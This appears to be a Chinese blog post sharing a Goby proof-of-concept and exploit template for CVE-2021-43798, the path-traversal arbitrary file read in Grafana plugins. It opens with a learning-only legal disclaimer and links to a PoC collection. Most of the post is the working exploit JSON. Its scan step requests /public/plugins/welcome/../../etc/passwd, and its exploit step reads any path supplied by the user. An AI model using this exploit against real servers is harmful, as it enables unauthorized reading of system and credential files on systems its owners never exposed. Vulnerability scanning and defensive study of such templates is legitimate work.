声明
本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。
代码
{
"Name": "Grafana Plugins Arbitrary File Read CVE-2021-43798",
"Level": "3",
"Tags": [
"fileread"
],
"GobyQuery": "( app=\"Grafana\" | title==\"Grafana\" )",
"Description": "Grafana是用于可视化大型测量数据的开源程序,他提供了强大和优雅的方式去创建、共享、浏览数据。dashboard中显示了你不同metric数据源中的数据。通过默认存在的插件,可构造特殊的请求包读取服务器任意文件。",
"Product": "Grafana",
"Homepage": "https://grafana.com/",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/DTkVTtbndaMWL9WGzaI32A"
],
"HasExp": true,
"ExpParams": [
{
"Name": "Path",
"Type": "input",
"Value": "../../../../../../../../../etc/passwd"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/public/plugins/welcome/../../../../../../../../../etc/passwd",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root:x:",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "daemon:x:",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/public/plugins/welcome/{{{Path}}}",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"PostTime": "2021-12-08 13:56:21",
"GobyVersion": "1.9.310"
}
poc集合
地址:https://github.com/aetkrad/goby_poc
帮助到你的话给个星吧!
699
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
